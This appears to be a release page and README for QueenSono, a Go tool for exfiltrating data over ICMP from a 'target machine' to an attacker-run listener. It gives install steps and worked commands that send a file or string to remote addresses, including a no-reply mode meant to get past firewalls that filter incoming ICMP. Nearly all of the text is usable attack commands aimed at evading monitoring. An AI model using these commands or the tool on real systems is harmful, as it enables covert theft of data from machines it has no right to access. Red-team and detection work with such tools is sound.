QueenSono v1.1.2 releases: data exfiltration with ICMP protocol
QueenSono ICMP Data Exfiltration
A Golang Package for Data Exfiltration with ICMP protocol.
QueenSono tool only relies on the fact that ICMP protocol isn’t monitored. It is quite common. It could also be used within a system with basic ICMP inspection (ie. frequency and content length watcher). Try to imitate PyExfil (and others) with the idea that the target machine does not necessarily have python installed (so provide a binary could be useful).
Notes
- only work on Linux (due to the use of golang net icmp package)
- need cap_net_raw capabilities
Changelog v1.1.2
- Mitigate size length bug #7
Install
Clone the repo and download the dependencies locally:
git clone https://github.com/ariary/QueenSono.git make before.build
To build the ICMP packet sender qssender :
build.queensono-sender
To build the ICMP packet receiver qsreceiver :
build.queensono-receiver
Usage
qssender is the binary which will send the ICMP packet to the listener, so it is the binary you have to transfer on your target machine.
qsreceiver is the listener on your local machine (or wherever you could receive icmp packet)
All commands and flags of the binaries could be found using –help
Example 1: Send with “ACK”
> In this example we want to send a big file and look after echo reply to acknowledge the reception of the packets (ACK).
On the local machine:
$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt
Explanation
- -l 0.0.0.0 listen on all interfaces for ICMP packet
- -f received_bible.txt save received data in a file
- -p show a progress bar of received data
On target machine:
$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt
Explanation
- send file for sending file (bible.txt is the file in question)
- -d 2 send a packet each 2 seconds
- -l 127.0.0.1 the listening address for echo reply
- -r 10.0.0.92 the address of my remote machine with qsreceiver listening
- -s 50000 the data size I want to send in each packet
Example 2: Send without “ACK”
> In this example we want to send a message without waiting for an echo reply (it could be useful in the case if target firewall filters incoming icmp packet)
On the local machine:
$ qsreceiver receive truncated 1 -l 0.0.0.0
Explanation
- receive truncated 1 does not wait indefinitely if we don’t receive all the packets. (1 is the delay used with qssender)
On the target machine:
$ qssender send “thisisatest i want to send a string w/o waiting for the echo reply” -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N
- -N noreply option (don’t wait for echo reply)
Source: https://github.com/ariary/
